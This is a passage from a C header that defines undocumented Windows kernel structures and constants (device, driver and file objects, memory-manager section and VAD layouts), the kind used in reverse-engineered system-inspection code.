FILE_DEVICE_VIRTUAL_BLOCK       0x00000053\n#define FILE_DEVICE_POINT_OF_SERVICE    0x00000054\n#define FILE_DEVICE_STORAGE_REPLICATION 0x00000055\n#define FILE_DEVICE_TRUST_ENV           0x00000056\n#define FILE_DEVICE_UCM                 0x00000057\n#define FILE_DEVICE_UCMTCPCI    
        0x00000058\n#define FILE_DEVICE_PERSISTENT_MEMORY   0x00000059\n#define FILE_DEVICE_NVDIMM              0x0000005a\n#define FILE_DEVICE_HOLOGRAPHIC         0x0000005b\n#define FILE_DEVICE_SDFXHCI             0x0000005c\n#define FILE_DEVICE_UCMUCSI             0x0000005d\n\n#define FILE_BYTE_ALIGNMENT             0x00000000\n#define FILE_WORD_ALIGNMENT             0x00000001\n#define FILE_LONG_ALIGNMENT             0x00000003\n#define FILE_QUAD_ALIGNMENT             0x00000007\n#define FILE_OCTA_ALIGNMENT             0x0000000f\n#define FILE_32_BYTE_ALIGNMENT          0x0000001f\n#define FILE_64_BYTE_ALIGNMENT          0x0000003f\n#define FILE_128_BYTE_ALIGNMENT         0x0000007f\n#define FILE_256_BYTE_ALIGNMENT         0x000000ff\n#define FILE_512_BYTE_ALIGNMENT         0x000001ff\n\n#define DPC_NORMAL 0\n#define DPC_THREADED 1\n\n#if _MSC_VER >= 1200\n#pragma warning(push)\n#pragma warning(disable:4324) // structure was padded due to __declspec(align())\n#endif\n\ntypedef struct DECLSPEC_ALIGN(MEMORY_ALLOCATION_ALIGNMENT) _DEVICE_OBJECT {\n    CSHORT Type;\n    USHORT Size;\n    LONG ReferenceCount;\n    struct _DRIVER_OBJECT* DriverObject;\n    struct _DEVICE_OBJECT* NextDevice;\n    struct _DEVICE_OBJECT* AttachedDevice;\n    struct _IRP* CurrentIrp;\n    PIO_TIMER Timer;\n    ULONG Flags;                                // See above:  DO_...\n    ULONG Characteristics;                      // See ntioapi:  FILE_...\n    __volatile PVPB Vpb;\n    PVOID DeviceExtension;\n    DEVICE_TYPE DeviceType;\n    CCHAR StackSize;\n    union {\n        LIST_ENTRY ListEntry;\n        WAIT_CONTEXT_BLOCK Wcb;\n    } Queue;\n    ULONG AlignmentRequirement;\n    KDEVICE_QUEUE DeviceQueue;\n    KDPC Dpc;\n\n    //\n    //  The following field is for exclusive use by the filesystem to keep\n    //  track of the number of Fsp threads currently using the device\n    //\n\n    ULONG ActiveThreadCount;\n    PSECURITY_DESCRIPTOR SecurityDescriptor;\n    KEVENT DeviceLock;\n\n   
 USHORT SectorSize;\n    USHORT Spare1;\n\n    struct _DEVOBJ_EXTENSION* DeviceObjectExtension;\n    PVOID  Reserved;\n\n} DEVICE_OBJECT;\n\ntypedef struct _DEVICE_OBJECT* PDEVICE_OBJECT;\n\n#if _MSC_VER >= 1200\n#pragma warning(pop)\n#endif\n\ntypedef struct _DEVOBJ_EXTENSION {\n\n    CSHORT          Type;\n    USHORT          Size;\n\n    //\n    // Public part of the DeviceObjectExtension structure\n    //\n\n    PDEVICE_OBJECT  DeviceObject;               // owning device object\n\n    // end_ntddk end_nthal end_ntifs end_wdm end_ntosp\n\n    //\n    // Universal Power Data - all device objects must have this\n    //\n\n    ULONG           PowerFlags;             // see ntos\\po\\pop.h\n    // WARNING: Access via PO macros\n    // and with PO locking rules ONLY.\n\n    //\n    // Pointer to the non-universal power data\n    //  Power data that only some device objects need is stored in the\n    //  device object power extension -> DOPE\n    //  see po.h\n    //\n\n    struct          _DEVICE_OBJECT_POWER_EXTENSION  *Dope;\n\n    //\n    // power state information\n    //\n\n    //\n    // Device object extension flags.  Protected by the IopDatabaseLock.\n    //\n\n    ULONG ExtensionFlags;\n\n    //\n    // PnP manager fields\n    //\n\n    PVOID           DeviceNode;\n\n    //\n    // AttachedTo is a pointer to the device object that this device\n    // object is attached to.  The attachment chain is now doubly\n    // linked: this pointer and DeviceObject->AttachedDevice provide the\n    // linkage.\n    //\n\n    PDEVICE_OBJECT  AttachedTo;\n\n    //\n    // The next two fields are used to prevent recursion in IoStartNextPacket\n    // interfaces.\n    //\n\n    LONG           StartIoCount;       // Used to keep track of number of pending start ios.\n    LONG           StartIoKey;         // Next startio key\n    ULONG          StartIoFlags;       // Start Io Flags. 
Need a separate flag so that it can be accessed without locks\n    PVPB           Vpb;                // If not NULL contains the VPB of the mounted volume.\n    // Set in the filesystem's volume device object.\n    // This is a reverse VPB pointer.\n\n    // begin_ntddk begin_wdm begin_nthal begin_ntifs begin_ntosp\n\n} DEVOBJ_EXTENSION, *PDEVOBJ_EXTENSION;\n\ntypedef struct _FAST_IO_DISPATCH {\n    ULONG SizeOfFastIoDispatch;\n    PVOID FastIoCheckIfPossible;\n    PVOID FastIoRead;\n    PVOID FastIoWrite;\n    PVOID FastIoQueryBasicInfo;\n    PVOID FastIoQueryStandardInfo;\n    PVOID FastIoLock;\n    PVOID FastIoUnlockSingle;\n    PVOID FastIoUnlockAll;\n    PVOID FastIoUnlockAllByKey;\n    PVOID FastIoDeviceControl;\n    PVOID AcquireFileForNtCreateSection;\n    PVOID ReleaseFileForNtCreateSection;\n    PVOID FastIoDetachDevice;\n    PVOID FastIoQueryNetworkOpenInfo;\n    PVOID AcquireForModWrite;\n    PVOID MdlRead;\n    PVOID MdlReadComplete;\n    PVOID PrepareMdlWrite;\n    PVOID MdlWriteComplete;\n    PVOID FastIoReadCompressed;\n    PVOID FastIoWriteCompressed;\n    PVOID MdlReadCompleteCompressed;\n    PVOID MdlWriteCompleteCompressed;\n    PVOID FastIoQueryOpen;\n    PVOID ReleaseForModWrite;\n    PVOID AcquireForCcFlush;\n    PVOID ReleaseForCcFlush;\n} FAST_IO_DISPATCH, *PFAST_IO_DISPATCH;\n\n#define IO_TYPE_ADAPTER                 0x00000001\n#define IO_TYPE_CONTROLLER              0x00000002\n#define IO_TYPE_DEVICE                  0x00000003\n#define IO_TYPE_DRIVER                  0x00000004\n#define IO_TYPE_FILE                    0x00000005\n#define IO_TYPE_IRP                     0x00000006\n#define IO_TYPE_MASTER_ADAPTER          0x00000007\n#define IO_TYPE_OPEN_PACKET             0x00000008\n#define IO_TYPE_TIMER                   0x00000009\n#define IO_TYPE_VPB                     0x0000000a\n#define IO_TYPE_ERROR_LOG               0x0000000b\n#define IO_TYPE_ERROR_MESSAGE           0x0000000c\n#define IO_TYPE_DEVICE_OBJECT_EXTENSION 
0x0000000d\n\n#define IRP_MJ_CREATE                   0x00\n#define IRP_MJ_CREATE_NAMED_PIPE        0x01\n#define IRP_MJ_CLOSE                    0x02\n#define IRP_MJ_READ                     0x03\n#define IRP_MJ_WRITE                    0x04\n#define IRP_MJ_QUERY_INFORMATION        0x05\n#define IRP_MJ_SET_INFORMATION          0x06\n#define IRP_MJ_QUERY_EA                 0x07\n#define IRP_MJ_SET_EA                   0x08\n#define IRP_MJ_FLUSH_BUFFERS            0x09\n#define IRP_MJ_QUERY_VOLUME_INFORMATION 0x0a\n#define IRP_MJ_SET_VOLUME_INFORMATION   0x0b\n#define IRP_MJ_DIRECTORY_CONTROL        0x0c\n#define IRP_MJ_FILE_SYSTEM_CONTROL      0x0d\n#define IRP_MJ_DEVICE_CONTROL           0x0e\n#define IRP_MJ_INTERNAL_DEVICE_CONTROL  0x0f\n#define IRP_MJ_SHUTDOWN                 0x10\n#define IRP_MJ_LOCK_CONTROL             0x11\n#define IRP_MJ_CLEANUP                  0x12\n#define IRP_MJ_CREATE_MAILSLOT          0x13\n#define IRP_MJ_QUERY_SECURITY           0x14\n#define IRP_MJ_SET_SECURITY             0x15\n#define IRP_MJ_POWER                    0x16\n#define IRP_MJ_SYSTEM_CONTROL           0x17\n#define IRP_MJ_DEVICE_CHANGE            0x18\n#define IRP_MJ_QUERY_QUOTA              0x19\n#define IRP_MJ_SET_QUOTA                0x1a\n#define IRP_MJ_PNP                      0x1b\n#define IRP_MJ_PNP_POWER                IRP_MJ_PNP      \n#define IRP_MJ_MAXIMUM_FUNCTION         0x1b\n\n// Public structure\ntypedef struct _DRIVER_EXTENSION {\n\n    //\n    // Back pointer to Driver Object\n    //\n\n    struct _DRIVER_OBJECT *DriverObject;\n\n    //\n    // The AddDevice entry point is called by the Plug & Play manager\n    // to inform the driver when a new device instance arrives that this\n    // driver must control.\n    //\n\n    PVOID AddDevice;\n\n    //\n    // The count field is used to count the number of times the driver has\n    // had its registered reinitialization routine invoked.\n    //\n\n    ULONG Count;\n\n    //\n    // The service name field is 
used by the pnp manager to determine\n    // where the driver related info is stored in the registry.\n    //\n\n    UNICODE_STRING ServiceKeyName;\n\n} DRIVER_EXTENSION, *PDRIVER_EXTENSION;\n\n// Private, since 7.1\ntypedef struct _DRIVER_EXTENSION_V2 {\n    struct _DRIVER_OBJECT* DriverObject;\n    PVOID AddDevice;\n    ULONG Count;\n    UNICODE_STRING ServiceKeyName;\n    struct _IO_CLIENT_EXTENSION* ClientDriverExtension;\n    struct _FS_FILTER_CALLBACKS* FsFilterCallbacks;\n} DRIVER_EXTENSION_V2, * PDRIVER_EXTENSION_V2;\n\n// Private, since 8.0\ntypedef struct _DRIVER_EXTENSION_V3 {\n    struct _DRIVER_OBJECT* DriverObject;\n    PVOID AddDevice;\n    ULONG Count;\n    UNICODE_STRING ServiceKeyName;\n    struct _IO_CLIENT_EXTENSION* ClientDriverExtension;\n    struct _FS_FILTER_CALLBACKS* FsFilterCallbacks;\n    PVOID KseCallbacks; //KernelShimEngine\n    PVOID DvCallbacks; //DriverVerifier\n} DRIVER_EXTENSION_V3, * PDRIVER_EXTENSION_V3;\n\n// Private, since 8.1\ntypedef struct _DRIVER_EXTENSION_V4 {\n    struct _DRIVER_OBJECT* DriverObject;\n    PVOID AddDevice;\n    ULONG Count;\n    UNICODE_STRING ServiceKeyName;\n    struct _IO_CLIENT_EXTENSION* ClientDriverExtension;\n    struct _FS_FILTER_CALLBACKS* FsFilterCallbacks;\n    PVOID KseCallbacks; //KernelShimEngine\n    PVOID DvCallbacks; //DriverVerifier\n    PVOID VerifierContext;\n} DRIVER_EXTENSION_V4, * PDRIVER_EXTENSION_V4;\n\n// Private, since 11 25XXX\ntypedef struct _DRIVER_EXTENSION_V5 {\n    struct _DRIVER_OBJECT* DriverObject;\n    PVOID AddDevice;\n    ULONG Count;\n    UNICODE_STRING ServiceKeyName;\n    struct _IO_CLIENT_EXTENSION* ClientDriverExtension;\n    struct _FS_FILTER_CALLBACKS* FsFilterCallbacks;\n    PVOID KseCallbacks; //KernelShimEngine\n    PVOID DvCallbacks; //DriverVerifier\n    PVOID VerifierContext;\n    struct _DRIVER_PROXY_EXTENSION* DriverProxyExtension;\n} DRIVER_EXTENSION_V5, * PDRIVER_EXTENSION_V5; /* size: 0x0058 */\n\n#define DRVO_UNLOAD_INVOKED             
0x00000001\n#define DRVO_LEGACY_DRIVER              0x00000002\n#define DRVO_BUILTIN_DRIVER             0x00000004    // Driver objects for Hal, PnP Mgr\n#define DRVO_REINIT_REGISTERED          0x00000008\n#define DRVO_INITIALIZED                0x00000010\n#define DRVO_BOOTREINIT_REGISTERED      0x00000020\n#define DRVO_LEGACY_RESOURCES           0x00000040\n// end_ntddk end_nthal end_ntifs end_ntosp\n#define DRVO_BASE_FILESYSTEM_DRIVER     0x00000080   // A driver that is at the bottom of the filesystem stack.\n// begin_ntddk begin_nthal begin_ntifs begin_ntosp\n\ntypedef struct _DRIVER_OBJECT {\n    CSHORT Type;\n    CSHORT Size;\n\n    //\n    // The following links all of the devices created by a single driver\n    // together on a list, and the Flags word provides an extensible flag\n    // location for driver objects.\n    //\n\n    PDEVICE_OBJECT DeviceObject;\n    ULONG Flags;\n\n    //\n    // The following section describes where the driver is loaded.  The count\n    // field is used to count the number of times the driver has had its\n    // registered reinitialization routine invoked.\n    //\n\n    PVOID DriverStart;\n    ULONG DriverSize;\n    PVOID DriverSection; //PLDR_DATA_TABLE_ENTRY\n    PDRIVER_EXTENSION DriverExtension;\n\n    //\n    // The driver name field is used by the error log thread to\n    // determine the name of the driver that an I/O request is/was bound.\n    //\n\n    UNICODE_STRING DriverName;\n\n    //\n    // The following section is for registry support.  This is a pointer\n    // to the path to the hardware information in the registry\n    //\n\n    PUNICODE_STRING HardwareDatabase;\n\n    //\n    // The following section contains the optional pointer to an array of\n    // alternate entry points to a driver for \"fast I/O\" support.  Fast I/O\n    // is performed by invoking the driver routine directly with separate\n    // parameters, rather than using the standard IRP call mechanism.  
Note\n    // that these functions may only be used for synchronous I/O, and when\n    // the file is cached.\n    //\n\n    PFAST_IO_DISPATCH FastIoDispatch;\n\n    //\n    // The following section describes the entry points to this particular\n    // driver.  Note that the major function dispatch table must be the last\n    // field in the object so that it remains extensible.\n    //\n\n    PVOID DriverInit;\n    PVOID DriverStartIo;\n    PVOID DriverUnload;\n    PVOID MajorFunction[IRP_MJ_MAXIMUM_FUNCTION + 1];\n\n} DRIVER_OBJECT;\ntypedef struct _DRIVER_OBJECT *PDRIVER_OBJECT;\n\n//\n// The following structure is pointed to by the SectionObject pointer field\n// of a file object, and is allocated by the various NT file systems.\n//\n\ntypedef struct _SECTION_OBJECT_POINTERS {\n    PVOID DataSectionObject;\n    PVOID SharedCacheMap;\n    PVOID ImageSectionObject;\n} SECTION_OBJECT_POINTERS;\ntypedef SECTION_OBJECT_POINTERS* PSECTION_OBJECT_POINTERS;\n\n//\n// Define the format of a completion message.\n//\n\ntypedef struct _IO_COMPLETION_CONTEXT {\n    PVOID Port;\n    PVOID Key;\n} IO_COMPLETION_CONTEXT, * PIO_COMPLETION_CONTEXT;\n\ntypedef struct _FILE_OBJECT {\n    CSHORT Type;\n    CSHORT Size;\n    PDEVICE_OBJECT DeviceObject;\n    PVPB Vpb;\n    PVOID FsContext;\n    PVOID FsContext2;\n    PSECTION_OBJECT_POINTERS SectionObjectPointer;\n    PVOID PrivateCacheMap;\n    NTSTATUS FinalStatus;\n    struct _FILE_OBJECT* RelatedFileObject;\n    BOOLEAN LockOperation;\n    BOOLEAN DeletePending;\n    BOOLEAN ReadAccess;\n    BOOLEAN WriteAccess;\n    BOOLEAN DeleteAccess;\n    BOOLEAN SharedRead;\n    BOOLEAN SharedWrite;\n    BOOLEAN SharedDelete;\n    ULONG Flags;\n    UNICODE_STRING FileName;\n    LARGE_INTEGER CurrentByteOffset;\n    __volatile ULONG Waiters;\n    __volatile ULONG Busy;\n    PVOID LastLock;\n    KEVENT Lock;\n    KEVENT Event;\n    __volatile PIO_COMPLETION_CONTEXT CompletionContext;\n    KSPIN_LOCK IrpListLock;\n    LIST_ENTRY IrpList;\n    
__volatile PVOID FileObjectExtension;\n} FILE_OBJECT;\ntypedef struct _FILE_OBJECT* PFILE_OBJECT;\n\ntypedef ULONG_PTR ERESOURCE_THREAD;\ntypedef ERESOURCE_THREAD* PERESOURCE_THREAD;\n\ntypedef struct _OWNER_ENTRY {\n    ERESOURCE_THREAD OwnerThread;\n    union {\n        LONG OwnerCount;\n        ULONG TableSize;\n    };\n\n} OWNER_ENTRY, *POWNER_ENTRY;\n\ntypedef struct _ERESOURCE {\n    LIST_ENTRY SystemResourcesList;\n    POWNER_ENTRY OwnerTable;\n    SHORT ActiveCount;\n    USHORT Flag;\n    PKSEMAPHORE SharedWaiters;\n    PKEVENT ExclusiveWaiters;\n    OWNER_ENTRY OwnerThreads[2];\n    ULONG ContentionCount;\n    USHORT NumberOfSharedWaiters;\n    USHORT NumberOfExclusiveWaiters;\n    union {\n        PVOID Address;\n        ULONG_PTR CreatorBackTraceIndex;\n    };\n\n    KSPIN_LOCK SpinLock;\n} ERESOURCE, *PERESOURCE;\n\n/*\n* WDM END\n*/\n\n/*\n* MM START\n*/\ntypedef ULONG MMSECTION_FLAGS2;\n\ntypedef struct _MMEXTEND_INFO {\n    ULONG_PTR CommittedSize;\n    ULONG ReferenceCount;\n} MMEXTEND_INFO, * PMMEXTEND_INFO; /* size: 0x0010 */\n\n//\n// Flags definitions valid only for Windows 10.\n//\ntypedef struct _MMSECTION_FLAGS {\n    struct {\n        UINT BeingDeleted : 1; /* bit position: 0 */\n        UINT BeingCreated : 1; /* bit position: 1 */\n        UINT BeingPurged : 1; /* bit position: 2 */\n        UINT NoModifiedWriting : 1; /* bit position: 3 */\n        UINT FailAllIo : 1; /* bit position: 4 */\n        UINT Image : 1; /* bit position: 5 */\n        UINT Based : 1; /* bit position: 6 */\n        UINT File : 1; /* bit position: 7 */\n        UINT AttemptingDelete : 1; /* bit position: 8 */\n        UINT PrefetchCreated : 1; /* bit position: 9 */\n        UINT PhysicalMemory : 1; /* bit position: 10 */\n        UINT ImageControlAreaOnRemovableMedia : 1; /* bit position: 11 */  //CopyOnWrite\n        UINT Reserve : 1; /* bit position: 12 */\n        UINT Commit : 1; /* bit position: 13 */\n        UINT NoChange : 1; /* bit position: 14 */\n        
UINT WasPurged : 1; /* bit position: 15 */\n        UINT UserReference : 1; /* bit position: 16 */\n        UINT GlobalMemory : 1; /* bit position: 17 */\n        UINT DeleteOnClose : 1; /* bit position: 18 */\n        UINT FilePointerNull : 1; /* bit position: 19 */\n        UINT PreferredNode : 6; /* bit position: 20 */\n        UINT GlobalOnlyPerSession : 1; /* bit position: 26 */\n        UINT UserWritable : 1; /* bit position: 27 */\n        UINT SystemVaAllocated : 1; /* bit position: 28 */\n        UINT PreferredFsCompressionBoundary : 1; /* bit position: 29 */\n        UINT UsingFileExtents : 1; /* bit position: 30 */\n        UINT PageSize64K : 1; /* bit position: 31 */\n    };\n} MMSECTION_FLAGS, * PMMSECTION_FLAGS; /* size: 0x0004 */\n\n//\n// Flags definitions valid only for Windows 10.\n//\ntypedef struct _SEGMENT_FLAGS {\n    union {\n        struct {\n            USHORT TotalNumberOfPtes4132 : 10; /* bit position: 0 */\n            USHORT Spare0 : 2; /* bit position: 10 */\n            USHORT LargePages : 1; /* bit position: 12 */\n            USHORT DebugSymbolsLoaded : 1; /* bit position: 13 */\n            USHORT WriteCombined : 1; /* bit position: 14 */\n            USHORT NoCache : 1; /* bit position: 15 */\n        }; \n        USHORT Short0;\n    }; /* size: 0x0002 */\n    union {\n        struct {\n            UCHAR FloppyMedia : 1; /* bit position: 0 */\n            UCHAR DefaultProtectionMask : 5; /* bit position: 1 */\n            UCHAR Binary32 : 1; /* bit position: 6 */\n            UCHAR ContainsDebug : 1; /* bit position: 7 */\n        };\n        UCHAR UChar1;\n    }; /* size: 0x0001 */\n    union {\n        struct {\n            UCHAR ForceCollision : 1; /* bit position: 0 */\n            UCHAR ImageSigningType : 3; /* bit position: 1 */\n            UCHAR ImageSigningLevel : 4; /* bit position: 4 */\n        };\n        UCHAR UChar2;\n    };\n} SEGMENT_FLAGS, * PSEGMENT_FLAGS; /* size: 0x0004 */\n\ntypedef struct 
_MI_SYSTEM_CACHE_VIEW_ATTRIBUTES {\n    union {\n        ULONGLONG NumberOfPtes : 6;\n        ULONGLONG PartitionId : 10;\n        ULONGLONG Spare : 2;\n        ULONGLONG SectionOffset : 48;\n    } u1;\n} MI_SYSTEM_CACHE_VIEW_ATTRIBUTES, * PMI_SYSTEM_CACHE_VIEW_ATTRIBUTES;\n\n#define VIEW_MAP_TYPE_PROCESS         1\n#define VIEW_MAP_TYPE_SESSION         2\n#define VIEW_MAP_TYPE_SYSTEM_CACHE    3\n\ntypedef struct _MI_REVERSE_VIEW_MAP {\n    struct _LIST_ENTRY ViewLinks;\n    union {\n        VOID* SystemCacheVa;\n        VOID* SessionViewVa;\n        struct _EPROCESS* VadsProcess;\n        ULONG Type : 2;\n    } u1;\n    union {\n        struct _SUBSECTION* Subsection;\n        ULONG SubsectionType : 1;\n    } u2;\n    union {\n        struct _MI_SYSTEM_CACHE_VIEW_ATTRIBUTES SystemCacheAttributes;\n        ULONGLONG AllAttributes; //Since W11\n        ULONGLONG SectionOffset;\n    } u3;\n} MI_REVERSE_VIEW_MAP, * PMI_REVERSE_VIEW_MAP; /* size: 0x0028 */\n\ntypedef struct _RTL_BALANCED_NODE {\n    union\n    {\n        struct _RTL_BALANCED_NODE* Children[2];\n        struct\n        {\n            struct _RTL_BALANCED_NODE* Left;\n            struct _RTL_BALANCED_NODE* Right;\n        };\n    };\n    union\n    {\n        UCHAR Red : 1;\n        UCHAR Balance : 2;\n        ULONG_PTR ParentValue;\n    };\n} RTL_BALANCED_NODE, * PRTL_BALANCED_NODE;\n\ntypedef struct _SEGMENT {\n\n    struct _CONTROL_AREA* ControlArea;\n    unsigned long TotalNumberOfPtes;\n    SEGMENT_FLAGS SegmentFlags;\n    ULONG_PTR NumberOfCommittedPages;\n    ULONG_PTR SizeOfSegment;\n\n    union {\n        struct _MMEXTEND_INFO* ExtendInfo;\n        void* BasedAddress;\n    } u1;\n\n    EX_PUSH_LOCK SegmentLock;\n\n    union {\n        union {\n            ULONG_PTR ImageCommitment;\n            ULONG CreatingProcessId;\n        };\n    } u2;\n\n    union {\n        union {\n            struct _MI_SECTION_IMAGE_INFORMATION* ImageInformation;\n            void* FirstMappedVa;\n        };\n    } 
u3;\n\n    struct _MMPTE* PrototypePte;\n\n} SEGMENT, * PSEGMENT;  /* size: 0x0048 */\n\ntypedef struct _CONTROL_AREA_COMPAT {\n\n    SEGMENT* Segment;\n    LIST_ENTRY ListHead;\n    ULONG_PTR NumberOfSectionReferences;\n    ULONG_PTR NumberOfPfnReferences;\n    ULONG_PTR NumberOfMappedViews;\n    ULONG_PTR NumberOfUserReferences;\n\n    union {\n        union {\n            ULONG LongFlags;\n            MMSECTION_FLAGS Flags;\n        };\n    } u;\n\n    union {\n        union {\n            ULONG LongFlags;\n            MMSECTION_FLAGS2 Flags;\n        };\n    } u1;\n\n    EX_FAST_REF FilePointer;\n    volatile LONG ControlAreaLock;\n    ULONG ModifiedWriteCount;\n    struct _MI_CONTROL_AREA_WAIT_BLOCK* WaitList;\n\n    union\n    {\n        struct\n        {\n            union\n            {\n                ULONG NumberOfSystemCacheViews;\n                ULONG ImageRelocationStartBit;\n            };\n            union\n            {\n                volatile LONG WritableUserReferences;\n                struct // version dependent, this bitset is not valid for w11\n                {\n                    unsigned long ImageRelocationSizeIn64k : 16; /* bit position: 0 */\n                    unsigned long LargePage : 1; /* bit position: 16 */\n                    unsigned long SystemImage : 1; /* bit position: 17 */\n                    unsigned long StrongCode : 2; /* bit position: 18 */\n                    unsigned long CantMove : 1; /* bit position: 20 */\n                    unsigned long BitMap : 2; /* bit position: 21 */\n                    unsigned long ImageActive : 1; /* bit position: 23 */\n                };\n            };\n            union\n            {\n                ULONG FlushInProgressCount;\n                ULONG NumberOfSubsections;\n                struct _MI_IMAGE_SECURITY_REFERENCE* SeImageStub;\n            };\n        } e2;\n    } u2;\n\n    //\n    // Incomplete definition, tail is version dependent.\n    //\n\n} 
CONTROL_AREA_COMPAT, * PCONTROL_AREA_COMPAT;\n\n//\n// N.B. \n// Only valid for Win10.\n// Change between Win10 versions.\n//\ntypedef struct _MMVAD_SHORT {\n    union\n    {\n        struct\n        {\n            struct _MMVAD_SHORT* NextVad;\n            void* ExtraCreateInfo;\n        };\n        struct _RTL_BALANCED_NODE VadNode;\n    };\n\n    ULONG StartingVpn;\n    ULONG EndingVpn;\n    UCHAR StartingVpnHigh;\n    UCHAR EndingVpnHigh;\n    UCHAR CommitChargeHigh;\n    UCHAR SpareNT64VadUChar;\n    LONG ReferenceCount;\n    EX_PUSH_LOCK PushLock;\n\n    ULONG LongFlags;\n    ULONG LongFlags1;\n\n    struct _MI_VAD_EVENT_BLOCK* EventList;\n\n} MMVAD_SHORT, * PMMVAD_SHORT;  /* size: 0x0040 */\n\ntypedef struct _MI_VAD_SEQUENTIAL_INFO {\n\n    struct {\n#if defined(_AMD64_)\n        ULONG_PTR Length : 12; /* bit position: 0 */\n        ULONG_PTR Vpn : 52; /* bit position: 12 */\n#else\n        ULONG Length : 11; /* bit position: 0 */\n        ULONG Vpn : 21; /* bit position: 11 */\n#endif\n    };\n\n} MI_VAD_SEQUENTIAL_INFO, * PMI_VAD_SEQUENTIAL_INFO;\n\n//\n// N.B. 
\n// Only valid for Win10.\n// Flags meanings change between Win10 versions.\n//\ntypedef struct _MMVAD_FLAGS {\n    struct\n    {\n        ULONG VadType : 3; /* bit position: 0 */\n        ULONG Protection : 5; /* bit position: 3 */\n        ULONG PreferredNode : 6; /* bit position: 8 */\n        ULONG PrivateMemory : 1; /* bit position: 14 */\n        ULONG PrivateFixup : 1; /* bit position: 15 */\n        ULONG Enclave : 1; /* bit position: 16 */\n        ULONG PageSize64K : 1; /* bit position: 17 */\n        ULONG RfgControlStack : 1; /* bit position: 18 */\n        ULONG Spare : 8; /* bit position: 19 */\n        ULONG NoChange : 1; /* bit position: 27 */\n        ULONG ManySubsections : 1; /* bit position: 28 */\n        ULONG DeleteInProgress : 1; /* bit position: 29 */\n        ULONG LockContended : 1; /* bit position: 30 */\n        ULONG Lock : 1; /* bit position: 31 */\n    };\n} MMVAD_FLAGS, * PMMVAD_FLAGS; /* size: 0x0004 */\n\n//\n// N.B. \n// Only valid for Win10.\n// Flags meanings change between Win10 versions.\n//\ntypedef struct _MMVAD_FLAGS1 {\n    struct\n    {\n        ULONG CommitCharge : 31; /* bit position: 0 */\n        ULONG MemCommit : 1; /* bit position: 31 */\n    };\n} MMVAD_FLAGS1, * PMMVAD_FLAGS1; /* size: 0x0004 */\n\n//\n// N.B. 
\n// Only valid for Win10.\n// Flags meanings change between Win10 versions.\n//\ntypedef struct _MMVAD_FLAGS2 {\n    struct\n    {\n        ULONG FileOffset : 24; /* bit position: 0 */\n        ULONG Large : 1; /* bit position: 24 */\n        ULONG TrimBehind : 1; /* bit position: 25 */\n        ULONG Inherit : 1; /* bit position: 26 */\n        ULONG NoValidationNeeded : 1; /* bit position: 27 */\n        ULONG PrivateDemandZero : 1; /* bit position: 28 */\n        ULONG Spare : 3; /* bit position: 29 */\n    };\n} MMVAD_FLAGS2, * PMMVAD_FLAGS2; /* size: 0x0004 */\n\ntypedef struct _MMVAD {\n\n    struct _MMVAD_SHORT Core;\n\n    union\n    {\n        union\n        {\n            ULONG LongFlags2;\n            volatile struct _MMVAD_FLAGS2 VadFlags2;\n        };\n    } u2;\n\n    struct _SUBSECTION* Subsection;\n    struct _MMPTE* FirstPrototypePte;\n    struct _MMPTE* LastContiguousPte;\n    LIST_ENTRY ViewLinks;\n    struct _EPROCESS* VadsProcess;\n\n    union\n    {\n        union\n        {\n            struct _MI_VAD_SEQUENTIAL_INFO SequentialVa;\n            struct _MMEXTEND_INFO* ExtendedInfo;\n        };\n    } u4;\n\n    FILE_OBJECT* FileObject;\n\n} MMVAD, * PMMVAD; /* size: 0x0088 */\n\ntypedef struct _MMVIEW {\n    ULONGLONG Entry;\n    union {\n        ULONGLONG Writable : 1;\n        struct _CONTROL_AREA* ControlArea; \n    };\n    LIST_ENTRY ViewLinks; \n    PVOID SessionViewVa;\n    ULONG SessionId;\n} MMVIEW, *PMMVIEW;\n\ntypedef struct _MI_IMAGE_ENTRY_IN_SESSION {\n    LIST_ENTRY Link;\n    PVOID Address;\n\n    //\n    // Incomplete and incorrect.\n    //\n\n} MI_IMAGE_ENTRY_IN_SESSION, * PMI_IMAGE_ENTRY_IN_SESSION;\n\ntypedef struct _SUBSECTION_COMPAT {\n\n    struct _CONTROL_AREA* ControlArea;\n    struct _MMPTE* SubsectionBase;\n    struct _SUBSECTION* NextSubsection;\n\n    //\n    // Incomplete definition.\n    //\n\n} SUBSECTION_COMPAT, * PSUBSECTION_COMPAT;\n\n//\n// This is Windows 10 only Section Object definition.\n// \n// N.B. 
It completely differs from anything else.\n//\ntypedef struct _SECTION_COMPAT {\n\n    RTL_BALANCED_NODE SectionNode;\n    ULONG_PTR StartingVpn;\n    ULONG_PTR EndingVpn;\n\n    union {\n        union {\n            struct _CONTROL_AREA* ControlArea;\n            struct _FILE_OBJECT* FileObject;\n            struct {\n                ULONG_PTR RemoteImageFileObject : 1; /* bit position: 0 */\n                ULONG_PTR RemoteDataFileObject : 1; /* bit position: 1 */\n            };\n        };\n    } u1;\n\n    ULONG_PTR SizeOfSection;\n\n    union {\n        ULONG LongFlags;\n        MMSECTION_FLAGS Flags;\n    } u;\n\n    struct {\n        ULONG InitialPageProtection : 12; /* bit position: 0 */\n        ULONG SessionId : 19; /* bit position: 12 */\n        ULONG NoValidationNeeded : 1; /* bit position: 31 */\n    };\n\n} SECTION_COMPAT, * PSECTION_COMPAT;  /* size: 0x0040 */\n\n/*\n* MM END\n*/\n\n/*\n*  Configuration Manager control vector\n*/\ntypedef struct _CM_SYSTEM_CONTROL_VECTOR_V1 {\n    PWSTR  KeyPath;\n    PWSTR  ValueName;\n    PVOID  Buffer;\n    PULONG BufferLength;\n    PULONG Type;\n} CM_SYSTEM_CONTROL_VECTOR_V1, * PCM_SYSTEM_CONTROL_VECTOR_V1;\n\n//\n// Since Windows 10 RS4\n//\ntypedef struct _CM_SYSTEM_CONTROL_VECTOR_V2 {\n    PWSTR  KeyPath;\n    PWSTR  ValueName;\n    PVOID  Buffer;\n    PULONG BufferLength;\n    PULONG Type;\n    ULONG Flags; //0 or 1 depends on flag from LOADER_PARAMETER_BLOCK attached hives\n    ULONG Spare0;\n} CM_SYSTEM_CONTROL_VECTOR_V2, * PCM_SYSTEM_CONTROL_VECTOR_V2;\n\n/*\n** Callbacks START\n*/\n\ntypedef NTSTATUS(*PEX_CALLBACK_FUNCTION) (\n    IN PVOID CallbackContext,\n    IN PVOID Argument1,\n    IN PVOID Argument2\n    );\n\ntypedef VOID(NTAPI* PEX_HOST_NOTIFICATION) (\n    _In_ ULONG NotificationType,\n    _In_opt_ PVOID Context);\n\ntypedef struct _EX_EXTENSION_INFORMATION_V1 {\n    USHORT Id;\n    USHORT Version;\n    USHORT FunctionCount;\n} EX_EXTENSION_INFORMATION_V1, * 
